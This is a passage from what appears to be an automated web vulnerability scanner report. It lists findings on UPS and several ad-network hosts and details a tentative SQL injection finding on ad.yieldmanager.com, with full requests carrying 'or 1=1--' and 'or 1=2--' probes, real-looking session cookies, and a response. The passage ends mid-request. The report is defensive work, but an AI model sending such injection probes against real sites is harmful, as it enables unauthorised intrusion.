3.640. https://www.ups.com/qvadmin/admin [loc parameter]

3.641. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

3.642. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

3.643. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

3.644. https://www.ups.com/sharp/prefapp [loc parameter]

3.645. https://www.ups.com/sharp/prefapp [loc parameter]

3.646. https://www.ups.com/sharp/prefapp [loc parameter]

3.647. https://www.ups.com/uis/create [REST URL parameter 1]

3.648. https://www.ups.com/uis/create [REST URL parameter 1]

3.649. https://www.ups.com/uis/create [REST URL parameter 1]

3.650. https://www.ups.com/uis/create [REST URL parameter 2]

3.651. https://www.ups.com/uis/create [REST URL parameter 2]

3.652. https://www.ups.com/uis/create [REST URL parameter 2]

3.653. https://www.ups.com/uis/create [loc parameter]

3.654. https://www.ups.com/uis/create [loc parameter]

3.655. https://www.ups.com/uis/create [loc parameter]

3.656. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]

3.657. http://www.webbyawards.com/webbys/current_honorees.php [season parameter]

3.658. http://www.wikia.com/index.php [actionName parameter]

3.659. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.660. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

3.661. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

3.662. http://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

3.663. https://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

3.664. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

3.665. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

3.666. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

3.667. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

3.668. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

3.669. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]

3.670. http://ar.voicefive.com/bmx3/broker.pli [ar_p84068139 cookie]

3.671. http://ar.voicefive.com/bmx3/broker.pli [ar_p84532700 cookie]

3.672. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

3.673. http://ar.voicefive.com/bmx3/broker.pli [ar_p86183782 cookie]

3.674. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p84053757 cookie]

3.675. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

3.676. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

3.677. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

3.678. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [ZEDOIDA cookie]

3.679. http://ib.adnxs.com/acb [acb816623 cookie]

3.680. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [cli cookie]

3.681. http://optimized-by.rubiconproject.com/a/4275/4801/21897-2.js [ruid cookie]

3.682. http://optimized-by.rubiconproject.com/a/4275/4801/6720-15.js [ruid cookie]

3.683. http://optimized-by.rubiconproject.com/a/6005/12414/22164-18.js [ruid cookie]

3.684. http://optimized-by.rubiconproject.com/a/6005/12414/23428-15.js [ruid cookie]

3.685. http://optimized-by.rubiconproject.com/a/6005/12414/24980-9.js [ruid cookie]

3.686. http://optimized-by.rubiconproject.com/a/6005/12414/24981-15.js [ruid cookie]

3.687. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]

3.688. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

3.689. http://tag.admeld.com/ad/iframe/216/us/728x90/news [meld_sess cookie]

3.690. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]

3.691. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]



1. SQL injection
There are 26 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs that you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.yieldmanager.com/imp [r parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The r parameter appears to be vulnerable to SQL injection attacks. The payloads 14513687%20or%201%3d1--%20 and 14513687%20or%201%3d2--%20 were each submitted in the r parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this case the two responses below were served by different back-end hosts (X-RightMedia-Hostname: ad0106.rm.ac4 and ad0118.rm.ac4), return different creatives (a linked image versus an iframe), and response 2 echoes the payload unchanged inside the iframe URL. That is also what ordinary ad rotation looks like, so repeat the identical request several times and compare those responses before treating the difference as evidence of injection.

Request 1

GET /imp?Z=728x90&s=967562&_salt=946042951&B=10&r=014513687%20or%201%3d1--%20 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/216/us/728x90/news?t=1297647385452&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; liday1=d`rYgq=h3gG298^!8dq8oBRGc; ih="b!!!!S!%!-u!!!!#<m9Vb!(4uP!!!!#<m8>D!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/WT!!!!#<m*Y#!+/Wc!!!!#<jbN?!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!-6s<!!!!#<m0_5!->h]!!!!%<m#26!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.T97!!!!#<k:^)!.`.U!!!!(<mZpq!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/?V,!!!!$<m!WT!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/S5#!!!!#<m*q.!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/j'@!!!!#<n!,f!/j'C!!!!#<miSV!/j'D!!!!#<myyF!/o!S!!!!#<m05y!/oCq!!!!'<m8A]!/oD)!!!!#<m!Tu!/pg`!!!!#<mCQ(!/pga!!!!$<m*q+!/uG1!!!!#<jbOF!00Gv!!!!#<l`GD!03?y!!!!#<m8Ab!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0!0C^%!!!!#<miS(!0C^(!!!!#<m8=j!0EGL!!!!#<m,_i!0ER1!!!!#<miT1!0LZy!!!!#<m,_`!0L[!!!!!$<mk>*!0L[#!!!!'<n!/j"; vuday1=wqsoTt+ars!8dq8^RDK#; 
pv1="b!!!!@!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~!#mP:!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mP>!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPA!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPD!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPG!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPJ!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!!iIx!-nK4!$Uo!!0ER1!%G-L!!!!$!?5%!%R8]5!ZZ<)!'%'p!'MyD~~~~~~<miT1~M.jTN!#p!r!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.
!%l4g!!j:k!'H85~~~~~<n!/j<n!Ey!!.vL!#p!u!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n!Ey!!.vL"; lifb=ck5e5rukLFjg_W2; bh="b!!!%1!!$ha!!?fS<mZsO!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!%<m#np!!,D(!!!!'<m#np!!-?2!!!!*<m#np!!-G2!!!!$<lise!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!)<m#np!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!'<mjPP!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!(<m#np!!2)5!!!!#<m#np!!4<u!!!!)<m#np!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!7gK!!!!#<lm]6!!<@x!!!!%<lSWC!!<P5!!!!#<m#np!!<P6!!!!#<m#np!!?VS!!DPb<lQiA!!C5(!!!!#<m#np!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L(^!!!!'<m8qE!!L_w!!!!+<m8qE!!MZU!!!!#<lQiC!!MfS!!!!$<mj`y!!Mr(!!ErC<k0fB!!ObA!!!!$<m#np!!ObV!!!!$<m#np!!OgU!!!!(<m#np!!T[J!!!!$<lm]6!!Z-E!!!!$<m#np!!Z-G!!!!$<m#np!!Z-L!!!!$<m#np!!Zw`!!!!%<m#np!!Zwb!!!!'<m#np!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!g[x!!!!#<m#np!!hqJ!!!!#<lP]!!!iEC!!!!'<m#np!!iEb!!!!)<m#np!!i_9!!!!$<m#np!!jD6!!!!#<lja'!!mDJ!!!!#<lQq8!!p.C!!!!$<n!1B!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!$<lmXb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ti>!!!!#<m!S_!!u[u!!!!(<lVbU!!utd!!!!(<lVbU!!utl!!!!#<lSD*!!uto!!!!#<lVbU!!uu)!!!!%<lSVZ!!v:e!!!!(<m#np!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!#!vF!!!!#<m*gT!#!vL!!!!#<m*gT!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#')-!!!!#<k2yx!#*<R!!!!%<ln'v!#*VS!!!!#<jLPe!#+]S!!!!(<m#np!#,##!!!!'<lSWC!#-vv!!!!$<iC/K!#.dO!!!!+<m8qE!#/:a!!!!$<lmXf!#/G2!!!!$<m#np!#/G<!!!!$<m#np!#/GO!!!!$<m#np!#/j>!!!!#<m*gT!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!?fS<mZsO!#2+>!!!!'<lS0M!#2Ic!!!!$<mj`x!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3(M!!!!#<m*gT!#3>,!!!!#<lmWu!#3>9!!!!#<lxx`!#3>C!!!!#<lxx]!#3>M!!!!#<lmdr!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(U!!!!#<myyA!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#6Ty!!!!#<myyA!#7(x!!!!*<m#np!#8*^!!!!#<mC=k!#8.'!!!!$<lmXe!#8:i!!!!#<jc#c!#8?7!!!!$<lmXb!#8A2!!!!#<k11E!#<T3!!!!#<jbNC!#@7F!!!!#<m8qE!#@wb!!!!#<m*gT!#CC>!!!!#<lS@,!#F1H!!!!'<lS0M!#FGA!!!!%<ln'v!#Fu6!!!!$<lm]6!#Fw_!!!!%<ln'v!#I=D!!!!
,<m915!#Ic1!!!!$<lmXc!#Ie+!!!!#<myyA!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!$<mjPP!#LI0!!!!#<k2yw!#LaM!!!!#<m,_i!#MAX!!!!#<mjra!#MTC!!!!-<m9Vb!#MTF!!!!-<m9Vb!#MTH!!!!-<m9Vb!#MTI!!!!-<m9Vb!#MTJ!!!!-<m9Vb!#Mub!!!!#<myyA!#NjS!!!!#<lI#*!#O4F!!!!#<m*gT!#O4I!!!!#<m*gT!#O4M!!!!#<m*gT!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#OH-!!!!#<m*gT!#PqQ!!!!#<lI#)!#PrV!!!!$<myyF!#Q*7!!!!#<n!1O!#Q+o!!!!+<m8qE!#Q<o!!!!#<mC=k!#Qh8!!!!#<l.yn!#R!r!!!!#<myyA!#RSx!!!!#<m*gT!#Ri/!!!!+<m8qE!#Rij!!!!+<m8qE!#SCj!!!!%<m*l:!#SCk!!!!(<m8qG!#SUp!!!!(<m#np!#SVp!!!!#<m*gT!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!$<lmXe!#TnE!!!!*<m9Vb!#Tnp!!!!$<lmXb!#UDQ!!!!-<m9Vb!#UJ4!!!!#<m*gT!#UJ9!!!!#<m*gT!#UL(!!!!%<lQW%!#V7#!!!!#<myyA!#VYG!!!!(<mCr1!#V]o!!!!%<mCr1!#V]u!!!!'<mCr1!#V]v!!!!'<mCr1!#W,W!!!!'<mCr1!#W-B!!!!%<mCr1!#W-^!!!!%<mCr1!#W.*!!!!'<mCr1!#W.B!!!!#<m*XR!#W.Q!!!!'<mCr1!#W/5!!!!'<mCr1!#W/A!!!!'<mCr1!#W/J!!!!$<m:Vy!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X:Z!!!!#<m*gT!#X]+!!!!'<kdT!!#Zb%!!!!#<m#np!#ZbF!!!!#<m#np!#ZbM!!!!#<m#np!#ZhT!!!!*<m#np!#Zmf!!!!$<kT`F!#[25!!!!%<lhqW!#[L>!!!!%<lise!#]%`!!!!$<m*Yw!#]Z#!!!!#<m#np!#^$?!!!!#<m*gT!#^0$!!!!(<m#np!#^0%!!!!(<m#np!#^d6!!!!$<m*Yw!#_+6!!!!#<m*gT!#_0t!!!!%<kTb(!#_1L!!!!#<m*gT!#`T=!!!!#<m#np!#`T>!!!!#<m#np!#`TF!!!!#<m#np!#`TG!!!!#<m#np!#`TJ!!!!#<m#np!#`TK!!!!#<m#np!#aCq!!!!'<lisd!#aG>!!!!+<m8qE!#aM'!!!!#<kp_p!#aly!!!!#<m*gT!#av4!!!!$<m!TH!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b?A!!!!#<l.x@!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#cC!!!!!#<ie2`!#dCU!!!!#<m*gT!#e)`!!!!#<m:W!!#e@W!!!!#<k_2)!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f$g!!!!%<mh@e!#fBj!!!!)<m#np!#fBk!!!!)<m#np!#fBm!!!!)<m#np!#fBn!!!!)<m#np!#fE=!!!!'<lQj,!#fG+!!!!)<m#np!#fJ/!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g/7!!!!(<m#np!#gC:!!!!#<lmdV!#gHO!!!!#<m*gT!#gPp!!!!#<m!TX!#gRx!!!!#<htU3!#g]5!!!!#<lm]?!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#gq`!!!!#<m*gT!#h.N!!!!#<kL2n!#jRq!!!!#<mZv)!#jS>!!!!#<k_Jy!#mP5!!!!$<lise!#mP6!!!!$<lis
e!#ndJ~~!#ndP!!!!$<lP]'!#ne$!!!!$<lP]'!#p7'!!!!#<myyA!#p9d!!!!#<lj09!#pD8!!!!+<n!/j!#q?L!!!!#<mjrb!#rJ)!!!!#<mn#6!#sXy!!!!#<n!/o!#so_!!!!#<mjPP!#sx#!!!!3<m9Vd!#t?S!!!!#<m`73"

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 15:04:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: ad0106.rm.ac4
Set-Cookie: ih="b!!!!T!%!-u!!!!#<m9Vb!(4uP!!!!#<m8>D!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*fR,!!!!#<n)p(!*gS^!!!!#<kI:#!+/WT!!!!#<m*Y#!+/Wc!!!!#<jbN?!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!-6s<!!!!#<m0_5!->h]!!!!%<m#26!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.T97!!!!#<k:^)!.`.U!!!!(<mZpq!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/?V,!!!!$<m!WT!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/S5#!!!!#<m*q.!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/j'@!!!!#<n!,f!/j'C!!!!#<miSV!/j'D!!!!#<myyF!/o!S!!!!#<m05y!/oCq!!!!'<m8A]!/oD)!!!!#<m!Tu!/pg`!!!!#<mCQ(!/pga!!!!$<m*q+!/uG1!!!!#<jbOF!00Gv!!!!#<l`GD!03?y!!!!#<m8Ab!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0!0C^%!!!!#<miS(!0C^(!!!!#<m8=j!0EGL!!!!#<m,_i!0ER1!!!!#<miT1!0LZy!!!!#<m,_`!0L[!!!!!$<mk>*!0L[#!!!!'<n!/j"; path=/; expires=Wed, 13-Feb-2013 15:04:16 GMT
Set-Cookie: vuday1=wqsoT.Sexft+ars!8dq8D:gog; path=/; expires=Tue, 15-Feb-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 15:04:16 GMT
Pragma: no-cache
Content-Length: 1099
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://adserving.cpxinteractive.com/clk?2,13%3Bfa3c674836a73c45%3B12e24b3572e,0%3B%3B%3B11717859,INNLAIrDDgBD0kgAAAAAAASeEwAAAAAAAgAAAAYAAAAAAP8AAAACCvNjGwAAAAAAxLkaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADWRAgAAAAAAAIAAgAAAAAAPFWzJC4BAAAAAAAAAGIwYjJlOTk4LTM4NGItMTFlMC04YWQ4LTAwMWIyNDkzNjNmMgBwAAAAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F216%2Fus%2F728x90%2Fnews%3Ft%3D1297647385452%26tz%3D360%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.independent.co.uk%252fnews%252fworld%252fafrica%252fis-the-army-tightening-its-grip-on-egypt-2213849.html%26refer%3D,\"><img border=\"0\" alt=\"\" height=\"90\" width=\"728\" src=\"http://content.yieldmanager.edgesuite.net/atoms/5a/cc/9e/e6/5acc9ee606bbd324e3c86a2c1abbeb2c.gif\"></img></
...[SNIP]...

Request 2

GET /imp?Z=728x90&s=967562&_salt=946042951&B=10&r=014513687%20or%201%3d2--%20 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/216/us/728x90/news?t=1297647385452&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; liday1=d`rYgq=h3gG298^!8dq8oBRGc; ih="b!!!!S!%!-u!!!!#<m9Vb!(4uP!!!!#<m8>D!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/WT!!!!#<m*Y#!+/Wc!!!!#<jbN?!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!-6s<!!!!#<m0_5!->h]!!!!%<m#26!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.T97!!!!#<k:^)!.`.U!!!!(<mZpq!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/?V,!!!!$<m!WT!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/S5#!!!!#<m*q.!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/j'@!!!!#<n!,f!/j'C!!!!#<miSV!/j'D!!!!#<myyF!/o!S!!!!#<m05y!/oCq!!!!'<m8A]!/oD)!!!!#<m!Tu!/pg`!!!!#<mCQ(!/pga!!!!$<m*q+!/uG1!!!!#<jbOF!00Gv!!!!#<l`GD!03?y!!!!#<m8Ab!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0!0C^%!!!!#<miS(!0C^(!!!!#<m8=j!0EGL!!!!#<m,_i!0ER1!!!!#<miT1!0LZy!!!!#<m,_`!0L[!!!!!$<mk>*!0L[#!!!!'<n!/j"; vuday1=wqsoTt+ars!8dq8^RDK#; 
pv1="b!!!!@!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~!#mP:!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mP>!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPA!-I0R!$Khv!0L